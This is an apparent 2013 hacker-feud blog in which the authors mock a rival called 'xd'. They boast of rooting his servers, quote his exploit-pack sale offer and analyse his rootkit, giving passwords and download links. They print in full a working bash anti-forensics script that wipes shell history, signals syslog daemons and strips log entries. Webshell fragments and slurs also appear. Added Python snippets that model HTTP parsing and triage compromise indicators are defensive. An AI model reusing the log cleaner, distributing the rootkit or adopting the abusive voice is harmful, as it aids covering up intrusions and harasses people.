Thursday, August 29, 2013

xd the faggot gets owned and rm'd, tries to deny it.

After rooting xd's shellbox, two of his ircd nodes, and corny's (xd dickrider) box, we've decided to publish the ownage here for you wonderful ladies and gentlemen who have been following our blog.

link: https://mega.co.nz/#!yUFAHAqA!X5BxhAmHEs6Wf0mkp_0doFYCTfgl57nJ6hgzF7AS2_8
mirror1: http://www.sendspace.com/file/pp4u8r
mirror2: http://xq74epoqlyeufi7m.onion/xdgotowned.tar.bz2

Predictably, xd immediately denied being owned by us, claiming that the boxes were honeypots setup by him all along. We'll allow you to be the judge of that.

http://valhalla.allalla.com/2013/08/response-to-the-yet-again-non-ownage-of-haqnet-and-dont-worry-i-will-respondmuch-more/

Anyhow, there is no ownage of Haqnet … as tropic would well know… i dont keep linux boxes, well, not under any of my handles/nicks, etc…

I don't think it gets any more asinine than this folks, xd can insist on living in his own little fantasy universe, but it won't change the fact that he got owned.

you can believe what you like, and understand this… I dont give a flying shit about who u are, but if you been busted…and then come at me, its called protecting myself… wizards box, was one big honeypot…and why didnt troppic already have root ??? coz, i didnt… it was a node, pwnd node… like the other piece of crap box...

This box (or more accurately, vps) which you paid USD $5.00 a month for is a "pwned node"? Your idiocy and lack of skills made it easy enough to root it.

to be continued… wen u will see, what happens,wen u fk with people, who you should have dealt with… u knew what was going on and were loling…

The usual threats. Unlike you, xd, we actually carry ours out.

so what now ??
now is MY turn to play your games…since u have given me NO choice…so expect, to be owned…. skid.

Sure.
 

Tuesday, August 27, 2013

Lulz: xd is delusional and thinks he can own Apache/xd's telnet bug

Just when you think xd can't sink any further into the depths of stupidity, he surprises you with this:

http://valhalla.allalla.com/2013/08/htp-owned-x2-enjoy-my-french-kiss-rf/ 

seems after 2 weeks, and a CRAP load of ddos from these lamers… was time to attack, again… this time i found a neat way thru telnet bug on debian… to do some fun stuff… here is the reason, or oneof them…and here is my reply….

[09:29am] <~xd> wat total lamers
[09:29am] <~xd> not even efnet has such skids
[09:29am] <~xd> thts saying alot
[09:31am] <~xd> ]# telnet ipv6.nullstate.se 80
[09:31am] <~xd> Trying 2001:470:c2cd::6667…
[09:31am] <~xd> Connected to ipv6.nullstate.se.
[09:31am] <~xd> Escape character is ‘^]’.
[09:31am] <~xd> hihi
[09:31am] <~xd> <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
[09:31am] <~xd> <html><head>
[09:31am] <~xd> <title>501 Method Not Implemented</title>
[09:31am] <~xd> </head><body>
[09:31am] <~xd> <h1>Method Not Implemented</h1>
[09:31am] <~xd> <p>hihi to / not supported.<br />
[09:31am] <~xd> </p>
[09:31am] <~xd> <hr>
[09:31am] <~xd> <address>Apache/2.2.16 (Debian) Server at ipv6.nullstate.se Port 80</address>
[09:31am] <~xd> </body></html>
[09:31am] <~xd> Connection closed by foreign host.
[09:31am] <~xd> abnnoying centos
[09:31am] <~xd> ah debian
[09:31am] <~xd> centos gives it str8 away
[09:32am] <~xd> # telnet ipv6.nullstate.se 80
[09:32am] <~xd> Trying 2001:470:c2cd::6667…
[09:32am] <~xd> Connected to ipv6.nullstate.se.
[09:32am] <~xd> Escape character is ‘^]’.
[09:32am] <~xd> POST rm -fr /
[09:32am] <~xd> catch yas
[09:32am] <~xd> lol
[09:32am] <~xd> they running apache on /
[09:32am] <~xd> silly
[09:32am] <~xd> <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
[09:32am] <~xd> <html><head>
[09:32am] <~xd> <title>408 Request Time-out</title>
[09:32am] <~xd> </head><body>
[09:32am] <~xd> </head><body>
[09:32am] <~xd> <h1>Request Time-out</h1>
[09:32am] <~xd> <p>Server timeout waiting for the HTTP request from the client.</p>
[09:32am] <~xd> <hr>
[09:32am] <~xd> <address>Apache/2.2.16 (Debian) Server at ipv6.nullstate.se Port 80</address>
[09:32am] <~xd> </body></html>
[09:32am] <~xd> Connection closed by foreign host.
[09:32am] <~xd> dead
 

whats matter… nomore boxes left for me to kill ?? oh darn, i feel so sorry for u,… i doooo….

After reading this, I feel more sorry for xd than ever. He's under the impression that he just rm'd somebody, by using telnet to send HTTP request headers containing arbitrary commands!

POST rm -fr / HTTP/1.1\r\n

The very idea that Apache could be so easily exploited is ridiculous, yet xd seems to believe it. Sadly, xd didn't even format his HTTP request headers properly, and as expected, his request timed out. True to his delusional and idiotic nature, xd interprets the HTTP response as the result of him rming the server, which never happened, never mind the fact that / refers to the httpd's root dir and not the root dir of the box itself. It's also hilarious that xd thinks that this bug exists, let alone has something to do with telnet (I suppose using telnet makes him feel like a leet hecker, which he will never be). It has become evident that xd is past the point of no return and beyond salvation, and it isn't surprising given the extent to which xd will lie to himself in order to rationalize his absurd and idiotic decisions. My recommendation to him is to stop blogging and embarrassing himself any further.
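To make the point concrete, here is a small model of how an HTTP/1.x server such as the Apache 2.2 in the transcript reads a request line. It is an added illustration written for this post, not Apache source and not code from the original page; it reproduces the 501 for "hihi", the 408 for "POST rm -fr /" (a protocol field means "now wait for headers", and no empty line ever came), and the 400 that even a "formatted" version would earn because "rm" is not a URL path.

```python
"""Model of how an HTTP/1.x server such as the Apache 2.2 in the transcript
reads a request line. Added illustration for this post; it is neither Apache
source nor code from the original page."""
import re
from dataclasses import dataclass
from typing import Optional

# Methods a stock Apache 2.2 recognises; anything else is "Method Not Implemented".
KNOWN_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "CONNECT"}
HTTP_VERSION_RE = re.compile(r"^HTTP/\d+\.\d+$")


@dataclass
class Verdict:
    status: Optional[int]  # HTTP status the server would send; None = well-formed
    reason: str
    method: str = ""
    target: str = ""
    version: str = ""


def _headers_terminated(rest: str) -> bool:
    """The header block ends at the first empty line (CRLF or bare LF)."""
    return re.search(r"(^|\n)\r?\n", rest) is not None


def classify_request(raw: bytes) -> Verdict:
    """Classify what a client typed at the socket the way the server would.

    Order matters and is the whole point of the transcript: the request line
    is parsed first; only a request that carries a protocol field makes the
    server wait for headers, and that wait ends in 408 if no empty line comes.
    """
    text = raw.decode("latin-1")
    first_line, newline, rest = text.partition("\n")
    if not newline:
        return Verdict(408, "request line never completed (no newline)")
    tokens = first_line.rstrip("\r").split()
    if not tokens:
        return Verdict(400, "empty request line")

    # Apache 2.2 splits on whitespace: first word is the method, second the
    # request target, and everything after that is taken as the protocol.
    method = tokens[0]
    target = tokens[1] if len(tokens) > 1 else "/"  # the 501 text shows "/" for a missing target
    version = " ".join(tokens[2:])                  # "" for a one- or two-token request

    if version:
        # A protocol field that is not HTTP/x.y is not rejected by Apache 2.2;
        # it is treated as HTTP/1.0, so "-fr /" still means "now read headers".
        if not HTTP_VERSION_RE.match(version):
            version = f"HTTP/1.0 (assumed; protocol field {version!r} unparseable)"
        if not _headers_terminated(rest):
            return Verdict(408, "Server timeout waiting for the HTTP request from the client",
                           method, target, version)
    else:
        version = "HTTP/0.9"  # simple request: no headers expected, answered at once

    if method not in KNOWN_METHODS:
        return Verdict(501, f"{method} to {target} not supported", method, target, version)
    if not (target.startswith("/") or target == "*" or "://" in target):
        # "rm" is neither an absolute path nor a URL; "/" in HTTP is a URL path,
        # the server's document root, not the filesystem root of the box.
        return Verdict(400, f"malformed request target {target!r}", method, target, version)
    return Verdict(None, "well-formed request; handed to the handler", method, target, version)


if __name__ == "__main__":
    # The two lines typed in the transcript, plus the "formatted" variant from the post.
    for typed in (b"hihi\r\n", b"POST rm -fr /\r\n", b"POST rm -fr / HTTP/1.1\r\n\r\n",
                  b"POST / HTTP/1.1\r\nHost: ipv6.nullstate.se\r\nContent-Length: 0\r\n\r\n"):
        v = classify_request(typed)
        print(f"{typed!r:60} -> {v.status} {v.reason}")
```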

[09:25am] <~xd> sure
[09:26am] <~xd> hiding behind a monitor making physical threats to someone who would crush them with left arm alone. tough


I find that utterly ironic. The authors of this blog have received numerous death threats and threats of physical violence (however improbable) from the likes of xd. More on that later...

 …. adios …..
if your a lamer, then oneday, u to can have my rm -french kiss ;) love ya…
another haqnet production…
xd

Fjear the xd! He has 0day Apache exploits and he will rm you!

xd reposts exploit code from 2003, exposes own ignorance

Just another example of xd's penchant for posting really old exploits coded by others:

http://valhalla.allalla.com/2013/08/exploit-samba-2-2-bruteforcer-root-exploit-x86/

Dont quote me on this, but, i KNOW 99% there is a few bugs within samba 2.2.* still, and, glancing over some codes today oprettymuch confirm it for windows, and, i decided, why include an exploit, when the best attack (linux) wise, is to bruteforce the leading bit, and subsequently, overwrite the evil c0de left by its devs..and, it is alwatys at prettymuch same place…so hey, whynot..if cant brute this then, you can use a different attack…wich, i cannnot release YET, but, will as soon as i get the o.k from the authors who, seem to wish it pvt… i aready did have a version, but, not ‘the’ new version…so, will sit on it and just say one thing, there iS bugs in smb 1 and smb2 trans() area, wich is, moreso for win32 but, still there for many linux…so, enjoy..
HaqNET

Yes, well, all this shows is xd's lack of progress more than anything else, as he's still trying to exploit samba 2.2.*, when the stable version of samba (at the time of this post) is 4.09.

Furthermore, xd seems unaware of modern exploit prevention methods such as ASLR and NX stack. Xd thinks that the address of the nopsled will always be static, and disregards the fact that returning to an address in a nopsled is a technique which will fail on almost all modern operating systems.

Especially laughable is how xd tries to save face by claiming that if the obsolete exploit fails, he has a private version of the exploit which he somehow cannot release (nevermind that the vulnerability is public and disclosed in 2003).

xd selling ripped/ancient exploits

Drew the big bad biker


It's bad enough that xd copies and pastes other people's code and calls it his own, now he's trying to sell it:

http://valhalla.allalla.com/2013/08/php-and-elenore-exploit-packs-sale/

Yea yea yea…
    i need cash, afterall, harley davidson is NOT cheap!
Selling :
- any and all skanner packs…and some never rlsd, nor seen by human eyes!
- elenore exploit pack, modified to invlude some nice stuff
- crimepack and some of its mods
- many many unnamed ones,but found in wild,ie; honeypotted and caught, for exploits only…
- sara expl pack
- MANY variations of mpack, and icepack, and many, many different bot/expl packs,wich are almost similar, but all seem to have own nice qualities…but mainly is, the amount i have, prettymuch will sell mutiples, for one price…ie; my elenore is NOT backdoored, so, its worth 5k usually… id be happy to combine it with some updated exploits…and yea, some are even my own… deopending on what u want to spend…
i have done nets for awhile, and unless u get a proper, or, a few versions, u will never get them to work… trust me on this…10yr botnet still running*
anyhow, if u want me, u know were to find me OR doomxd@gmail.com or my ircd @ irc.haqnet.net SSL ONLY port 31337 #Haqnet! and yes there is ipv6.haqnet.net also! thankyou..

Ok Drew, once again, you're not fooling anybody. It isn't a coincidence that all the exploit packs you're selling were all already leaked, and not only that, you also insist on selling shit from six or seven years ago like mpack and icepack. But I suppose xd will do anything to support his druggie habits.


Sunday, August 18, 2013

Short analysis of the sebd rootkit, ("xd's version")

What xd doesn't understand is that, he will always be 1000 steps behind us :)

Awhile ago ocean gave a list of roots out in haqnet. Knowing that xd would deploy his 'super leet rootkit' that he brags about, we decided to log ssh on some of the boxes. Leaving/being banned from HaqNET, we waited a month or so. As expected, several of the boxes were dead due to xd's lack of stealth. After joining ircd for what, the 2nd time after being banned for asking for the challenge, ocean decided it was time to trick this idiot ^_^,  more on this in the upcoming post, but essentially ocean irc'd with a root that we knew was still up, and probably kitted by xd. He felt so powerful when he logged in, and ran yum update, LOL, well, thanks to his stupidity, we have this information, oh, and he even admits that ocean ended up rming that box right after, so uh, who actually got owned here..?

Information on xd's methods of being stealthy/keeping ax to compromised boxes:

he rm'd tons of shit, such as /var/log/*, super stealthy man

three new users added: 

adms
daemons
strace
 

an example entry from shadow (didn't bother cracking it):

strace:h3bCsDM35lQY6:15874:0:99999:7:::

And well, we guess the shit-kit failed, so he had to ssh into the box,

adms:thesecret404 <--- LOL NICE

And the home dirs of the users were set to /var/lib, each one of them had a set-uid binary named 'su' in their dirs, once again, talk about stealth!

an example:

/var/lib/strace/su <--- 4755 (u+s/setuid)

his super leet rkit was deployed on the box:

We were excited to recover his rootkit, it was supposed to be fun to pwn it, we were sadly mistaken. The rootkit was just a modified version of a kit Romanian script kiddies use (originated around 2003).

*notes:
  • Creates several files with hardcoded names (rkhunter/chkrootkit, anyone?)
  • Uses some form of encryption, sniffs packets on the compromised system
  • Always sends reverse shells to the same hardcoded port 43333
  • Uses DES crypt "hashes" for its password. This is kiiiinda hardcoded but we can sed it out LOL, if you were curious, the hash was "crnGtapg9Zb6I", and the plaintext result of that was "103-craz". xd doesn't realize that DEScrypt limits you to 8 chars.
  • We're guessing, and hoping, the source code for this has a little config.h or something that lets us change these things
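For anyone who has to check a box for the same leftovers, here is a triage script covering the indicators above: login accounts homed under /var/lib, shadow entries still in 13-char DES crypt, setuid copies of su outside the system bin dirs, and established connections to the hardcoded 43333 callback port. It is an added example, not the post's or the kit's code; every passwd/shadow/find/ss sample line in it is constructed except the shadow entry and the su path quoted in the post, and on a real host you would feed it the actual files and command output (root needed for shadow).

```python
"""Host triage for the indicators this post pulls off the kitted box: added
accounts homed under /var/lib, legacy DES-crypt shadow entries, setuid copies
of 'su' outside the system binary directories, and connections to the
hardcoded callback port. Added example, not the post's code; every sample
passwd/shadow/find/ss line below is constructed except the shadow entry and
the su path quoted in the post."""
import re
from typing import Dict, List, Tuple

SYSTEM_BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                   "/usr/local/bin/", "/usr/local/sbin/")
SEBD_CALLBACK_PORT = 43333  # reverse-shell port the post says is hardcoded in the kit
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")  # traditional crypt(3): 2-char salt + 11 chars

# --- constructed samples --------------------------------------------------
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
adms:x:1001:1001::/var/lib/adms:/bin/bash
daemons:x:1002:1002::/var/lib/daemons:/bin/bash
strace:x:1003:1003::/var/lib/strace:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$constructedsalt$constructedhashvalue:15874:0:99999:7:::
daemon:*:15874:0:99999:7:::
strace:h3bCsDM35lQY6:15874:0:99999:7:::
"""
# Output shape of: find / -xdev -perm -4000 -type f -printf '%m %p\n'
SAMPLE_FIND = """\
4755 /bin/su
4755 /usr/bin/passwd
4755 /var/lib/strace/su
4755 /var/lib/adms/su
"""
# Output shape of: ss -tn state established  (TEST-NET addresses, constructed)
SAMPLE_SS = """\
Recv-Q Send-Q Local Address:Port Peer Address:Port
0      0      192.0.2.10:22      198.51.100.20:51911
0      0      192.0.2.10:51034   198.51.100.7:43333
"""


def odd_home_accounts(passwd: str, home_prefix: str = "/var/lib/") -> List[str]:
    """Login-capable accounts whose home sits under a directory no person should own."""
    hits = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, _uid, _gid, _gecos, home, shell = fields
        if home.startswith(home_prefix) and not shell.endswith(("nologin", "false")):
            hits.append(name)
    return hits


def legacy_des_hashes(shadow: str) -> Dict[str, str]:
    """Accounts still on DES crypt: 13 chars, no $id$ prefix, password cut at 8 chars,
    so a recovered hash cracks fast and the 'real' password may be longer than what works."""
    return {f[0]: f[1] for f in (row.split(":") for row in shadow.splitlines())
            if len(f) >= 2 and DES_CRYPT_RE.match(f[1])}


def setuid_outside_system_dirs(find_output: str) -> List[Tuple[str, str]]:
    """(mode, path) for setuid files that are not in a system binary directory."""
    hits = []
    for line in find_output.splitlines():
        mode, _, path = line.partition(" ")
        # leading octal digit 4/5/6/7 carries the setuid bit
        if len(mode) == 4 and mode[0] in "4567" and not path.startswith(SYSTEM_BIN_DIRS):
            hits.append((mode, path))
    return hits


def callback_connections(ss_output: str, port: int = SEBD_CALLBACK_PORT) -> List[str]:
    """Peer endpoints of established TCP connections to the hardcoded callback port."""
    peers = []
    for line in ss_output.splitlines()[1:]:  # skip the header row
        cols = line.split()
        if len(cols) < 4:
            continue
        peer = cols[3]
        _host, _, peer_port = peer.rpartition(":")
        if peer_port.isdigit() and int(peer_port) == port:
            peers.append(peer)
    return peers


if __name__ == "__main__":
    print("homes under /var/lib:", odd_home_accounts(SAMPLE_PASSWD))
    print("DES-crypt hashes:", legacy_des_hashes(SAMPLE_SHADOW))
    print("stray setuid binaries:", setuid_outside_system_dirs(SAMPLE_FIND))
    print("callback connections:", callback_connections(SAMPLE_SS))
```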
To mock Drew we decided to relay/mirror this kit with a new install script to the common script kiddie hangout site known as hackforums, what's sad is that some of them have more skill than xd.

xd, why do you even try to act like you have knowledge, you name your github "x90", yet you probably don't understand the role of NOP in exploits/code in general. That being said, it is amazing the guy has the audacity to talk shit on a decent backdoor PoC.

https://github.com/x90/ssh_rape

"A c00l kit ???
but, were is, logging into, maybe OPEN tcp ports...etc etc.... you should look @ sebd (id b happy to give u copy...) , and sshtrix 9via noptrix...0 , maybe adding some extra functionality, would b cool... but, i dont know.... it is sofar, a very good method, BUT, not as good as, the one i use :> xd"

This is blasty @ fail0verflow's PoC that he showed off @ hackinthebox, it is 100x better than sebd, why would it log, it's a PoC, logging is a feature the coder would implement to weaponize this, the 'method' is kinda old, however, it is MUCH better than the piece of shit you use, stop acting like you are the latest and greatest, you have no cool w4r3z.

https://github.com/blasty
www.hackintherandom2600nldatabox.nl/archive/slides/2012/blasty.pdf

^ you should attempt reading that xd

Link to sebd (original w/installer) + sebd (xd's version + our own installer, [in case you actually want to try this piece of shit out])

Original sebd: http://easkytb.3host.ro/phrame.php?action=saveDownload&fileId=21576

xd's sebd + our installer: http://www.multiupload.nl/0ZIB0QCBL3

Thanks for reading!

Terrible code - produced by xd!

Just to show you how bad xd's code is..

http://valhalla.allalla.com/2013/08/sabre-bash-log-cleaner-haqnet/

Of course, knowing this idiot, we guessed the password (1st try, lol..), so, the password is: haqnet

TL; DR, this 'cleaner' rm/fills /var/log/* <-- xd's definition of stealth, LOL

The code is hideous, and from the looks it won't really work either. It also attempts to remove ancient kits such as tuxkit, since 2002 is the only shit xd is capable of pwning with his Romanian 0day scripts [more on that soon]. We do not recommend anyone use this piece of shit.

Thanks for reading.

#!/bin/sh
# SABRE – BASH BASED LOGCLEANER (Based on Sauber so a befitting name)
# Usage: sauber <string>
# NOTE: Feel free to change/edit or update this and send it back to us admin@crazycoders.com !
#       Remeber,this WONT do your job completely for you,and i DID leave out some kits,this
#       kit-remover was borrowed then updated due to times-a-changin ,enjoi
#       or hit us up on irc.haqnet.net (SSL-ONLY) Port 31337 join #Haqnet // CrazyCODERS.COM // [HaqNET]
#########################################################################################################

kill -9 -0

BLK=' [1;30m'
RED=' [1;31m'
GRN=' [1;32m'
YEL=' [1;33m'
BLU=' [1;34m'
MAG=' [1;35m'
CYN=' [1;36m'
WHI=' [1;37m'
DRED=' [0;31m'
DGRN=' [0;32m'
DYEL=' [0;33m'
DBLU=' [0;34m'
DMAG=' [0;35m'
DCYN=' [0;36m'
DWHI=' [0;37m'
RES=' [0m'

echo "[+] ${BLK}* ${DWHI}Cleaning the mess.. may take some time depenz on size of the logs.${RES}"
echo "unset HISTFILE" >> /root/.bash_profile
echo "unset HISTSAVE" >> /root/.bash_profile
echo "unset HISTFILE" >> .bash_profile
echo "unset HISTSAVE" >> .bash_profile
unset HISTFILE
unset HISTSAVE
killall -HUP perl
killall -HUP syslogd
killall -HUP rsyslogd
killall -HUP syslog
killall -HUP rsyslog
killall -HUP syslog-ng
killall -HUP syslog-ng2
killall -HUP syslog-ng3
killall -HUP logger
killall -HUP 2323
kill -9 2323
history -c
rm -rf .bash_history
rm -rf /root/.bash_history
ln .bash_history -s /dev/null
ln /root/.bash_history -s /dev/null
chattr -R -ASacdisu /sbin /bin /usr/bin/ /usr/sbin/ /usr/local/bin/ /usr/local/sbin/

WERD=$(/bin/ls -Faloh /var/log | grep -v "lastlogin" | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp" | grep -v "wtmp" | grep -v "vtmp" | grep -v "xtmp" | grep -v "@" | grep -v ".txt" | grep -v "b.pl" | grep -v "scan.txt" | grep -v ".txt.php" | grep -v ".php.gif" | grep -v "mfu.txt" | grep -v "bios.txt" | grep -v "sort" | grep -v "ips" | grep -v "ipsort" | grep -v "a.txt" | grep -v "IRC" | grep -v "[SSH]" | grep -v "scan.txt" | grep -v "mis.php" | grep -v "php://input" | grep -v "got root"| grep -v "[LOG*" | grep -v "[SEC*" | grep -v "[IPFW*" | grep -v "[IPTABL*" | grep -v "LOG*" | grep -v "SEC*" | grep -v "IPFW*" | grep -v "byroe" | grep -v "ss" | grep -v "tail*" | grep -v "email:")

WERDZ=$(/bin/ls -Faloh /var/log/security | grep -v "lastlogin" | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp" | grep -v "wtmp" | grep -v "vtmp" | grep -v "xtmp" | grep -v "@" | grep -v ".txt" | grep -v "b.pl" | grep -v "scan.txt" | grep -v ".txt.php" | grep -v ".php.gif" | grep -v "mfu.txt" | grep -v "bios.txt" | grep -v "sort" | grep -v "ips" | grep -v "ipsort" | grep -v "a.txt" | grep -v "IRC" | grep -v "[SSH]" | grep -v "scan.txt" | grep -v "mis.php" | grep -v "php://input" | grep -v "got root" | grep -v "[LOG*" | grep -v "[SEC*" | grep -v "[IPFW*" | grep -v "[IPTABL*" | grep -v "LOG*" | grep -v "SEC*" | grep -v "IPFW*" | grep -v "byroe" | grep -v "ss" | grep -v "tail*" | grep -v "email:")

for fil in $WERD
do
line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}..${RES}"
grep -v $1 /var/log/$fil > new
touch -r /var/log/$fil new
mv -f new /var/log/$fil
newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
let linedel=$(($line-$newline))
#echo "${WHI}$linedel ${DWHI}lines removed: [/var/log] ${RES} ..”
#done
for filz in $WERDZ
do
linex=$(wc -l /var/log/security/$filz | awk -F ' ' '{print $1}')
echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$filz ($linex ${DWHI}lines${WHI})${BLK}..${RES}"
grep -v $1 /var/log/security/$filz > newx
touch -r /var/log/security/$filz newx
mv -f new /var/log/security/$filz
newlinex=$(wc -l /var/log/security/$filz | awk -F ' ' '{print $1}')
let linedel=$(($linex-$newlinex))
echo "${WHI}$linedel ${DWHI}lines removed: [/var/log/security] ${RES} .."
done

##remove known rootkits
echo "${C1}#${E} Checking for kitZ .."
if [ -d "/dev/tuxkit" ]; then
rm -rf /dev/tuxkit
rm -rf /dev/tux*
fi
if [ -d "/dev/fdg" ]; then
rm -rf /dev/fdg
rm -rf /dev/fdg*
fi
if [ -d "/dev/.hijackerz" ]; then
rm -rf /dev/.hijackerz
rm -rf /dev/.hijack*
fi
if [ -d "/usr/src/.puta" ]; then
rm -rf /usr/src/.puta
rm -rf /usr/src/.puta*
grep -v /usr/src/.puta /root/.bash_profile > /tmp/.lock-01002231292
touch -acmr /root/.bash_profile /tmp/.lock-01002231292
mv -f /tmp/.lock-01002231292 /root/.bash_profile
rm -f /tmp/.lock-01002231292
rm -f /tmp/.lock-010022*
fi

echo "unset HISTFILE" >> /root/.bash_profile
echo "unset HISTSAVE" >> /root/.bash_profile
echo "unset HISTFILE" >> .bash_profile
echo "unset HISTSAVE" >> .bash_profile
unset HISTFILE
unset HISTSAVE
killall -HUP perl
killall -HUP syslogd
killall -HUP rsyslogd
killall -HUP syslog
killall -HUP rsyslog
killall -HUP syslog-ng
killall -HUP syslog-ng2
killall -HUP syslog-ng3
killall -HUP logger
killall -HUP 2323
kill -9 2323
history -c
rm -rf .bash_history
rm -rf /root/.bash_history
ln .bash_history -s /dev/null
ln /root/.bash_history -s /dev/null
echo "[!] ${BLK}* ALL Done -> exiting .."

skid-alert: xd can't understand the basicz

Alright, so I suppose it is time to go show one-by-one how each one of xd's posts are retarded. The first post we are going to be talking about:

http://valhalla.allalla.com/2013/08/htp-owned-by-xd-haqnet/

We are in no way affiliated with aush0k, etc.

"OK, I GOT TOLD BY THE OWNEES THAT THIS IS PHP KEY CRYPTOGRAPHY ….FUNNY COZ IT SEEMS LIKE PLAIN OL TEXT TO ME.. :S ;) OWNED..AGAIN
anyhow… here, is some fun things you may wish to do, when you find that these kids ie; ocean ,calling me a lamer, because i FIX crippled exploits…well, in this online Fuhosin shell i found, it was really pathetic..and, handed me theyre login keys, login passes, and RSA PRIVATE key ..and there is plenty more if you goto :"

First off, excellent grammar. Second off, I'd love for him to explain how we're owned. It is quite obvious he doesn't understand how cryptography works, and he couldn't even understand how the 'fuhosin' webshell works. He also links to a shell that is just a text file due to someone's failed upload (trying to change extensions, etc). He also claims to 'fix crippled exploits'. This one made us chuckle; here are a few samples of his 'fixing':

http://pastebin.com/Ns5YPrF7
http://pastebin.com/3WhtpdEc
http://pastebin.com/3yvfMChr
http://pastebin.com/Csp1Z1AZ
http://pastebin.com/K1yWwbT6

He has 'fixed' other exploits too, but I didn't bother saving them. Anyone with basic knowledge of kernel architecture and decent low level programming can fix an exploit; sadly xd possesses neither. So if we take a look at these 'fixed exploits', it is quite evident all he is doing is pasting some code, bullshitting comments, and claiming they are now better/fixed. People who have talked to xd before and left, because they know he's an idiot, also know that he has no programming skills whatsoever.

"## ok so we see later, the ssh pass being set to ‘dongpass’ ,BUT when you have the pvt keyfile,and, know now, how to dismantle this little shell.. well…
theyre latest claim to fame, is beeimg.com , lol, wich, is a joke… my claim to fame, was owning nasa at 13yrs of age..but yea, ‘ocean’ was quick to call me a has been.. and, i am actually, the ONLY person who is hanging onto a VERY awesome local root,BUT,since it rocks,and, since i found myself 100% ,i would LOVE a version wich will spawn root, yes, EVERY kernel, EVERY protection, and even bsd’s@! NOTHING can save from this… until, it is disclosed…and since i tried, to disclose many times thru FD lists, and was laughed at and, called another person…well, i would have happily worked with them, and, i would still, BUT, there would be a VERY strict agreement around this exploit.. and, it is NOT as simple as it seems, to  spawn a shell..due to the nature of the binary,..wich, i will release, soon as it is a complete p0c ,and not a one-liner as it is now.."

This guy is pure comedy, we will show you what he's trying to talk about, but first, let's address the other parts of his statements. Where did we claim that site to be our fame? Bouncing off of a box to your ircd is claiming fame? Back when xd was 13, (the 80s or so), owning NASA was not hard, ironically it's still not hard today, running java (ahem coldfusion), jsp, and tons of flawed cgis and more makes it quite an easy target to own, that being said, with the skill portrayed from xd, one would highly doubt he pwnd NASA.

Okay, he is hanging on to a local root (mind you this guy doesn't understand the difference between ring0/ring3 or userland vs kernel), he claims he has a 'local root', but then says he would love a version that spawns root... Ok, in that case we all have local roots, they just don't spawn root. That makes absolutely no fucking sense, unless he has some sort of a bug which allows you to edit root owned files, in which case he could temporarily add himself to sudoers, edit passwd/shadow, edit a suid bin, add his public key into a privileged user's home? If you have a vuln like that and didn't even think of that type of shit, then it is likely it isn't your bug :P, however with the lack of friends xd has it is doubted he possesses any such bug. Hang on, you call yourself a blackhat, but then want to disclose this to full disclosure? Of course you were laughed at, you have no fucking idea what you're saying, LOL.
function chippy_udp_reverse($ip,$port) { // Yeah, I copied and pasted and str_replaced the one above. Sue me. ~ Aurora    
" ^^ so, they want, to copy/paste..then later…"

First off, it is copy pasting from the code above that line, what is xd trying to prove here?
function kolang_reverse($host, $port) { // PHP 4.3.10 – 5.3.0 Safe Mode bypass exploit – CVE-2009-4018 // fuck you IHSteam dont cripple your sploits    
"^^ I was teased about ‘fixing’ NON root/d0s based stuff..wich, sometimes, is NOT me fixing atall.. as with the latest root expl ‘hemlock.c’ wich is seen as a d0s ,i was only sent, the working local root version..wich, i will post, soon..
now, on with our pwnage of theyre shell,wich, i believe theyre now using my own ideas,or, trying LOL, and, i mean, they have some php.ini overwrite ‘bypass’ ,now correct me if im wrong, but, the two things wich is breaking things, is silly shit like this… the second you start to act like this, and overwrite, i clearly know you have not even looked at php -help ! php -n == ignore ALL ini files , and execute code"

Ok, Drew, stop crying about being teased. First off, you wouldn't know the first place to start in writing a kernel exploit; no one, unless they are feeling as generous as fuck or on crack, would send you a decent exploit. You claim to release it soon, it's been a while, where is it? Don't fabricate bullshit. This shell has been around for a year or two, no one took your lame ass ideas, the overwriting of php.ini is a classic trick to circumvent shit; clearly your dumbass doesn't understand php or hacking whatsoever.

"php -n == ignore ALL ini files , and execute code"

Hey dumbass, do you understand what CLI is? php -n is a command line option to ignore php.ini. The webshell allows us to exec code, if we had cli, who would care about any of it?

"## ok so we see later, the ssh pass being set to ‘dongpass’ ,BUT when you have the pvt keyfile,and, know now, how to dismantle this little shell.. well…"

The ssh pass is not being set to 'dongpass', that is just the form name..Don't believe me?

https://gist.github.com/redhat69/3903275/raw/bdf5ff9789445cab8c485d2a45e759d4660b6429/gistfile1.txt
function login() { // keep lam3rz out  
echo "<title>ah ah ah, you didn't say the magic word!</title>  
<body bgcolor=\"black\"><table border=0 width=100% height=100%><td valign=\"middle\"><center>  
<form action=".basename(__FILE__)." method=\"POST\">  
<input type=\"password\" maxlength=\"32\" name=\"dongpass\">  
</form>  
</table>"; }   
the html field name = dongpass, hi, yes how is that a password?

"now on with the HTP lol@..

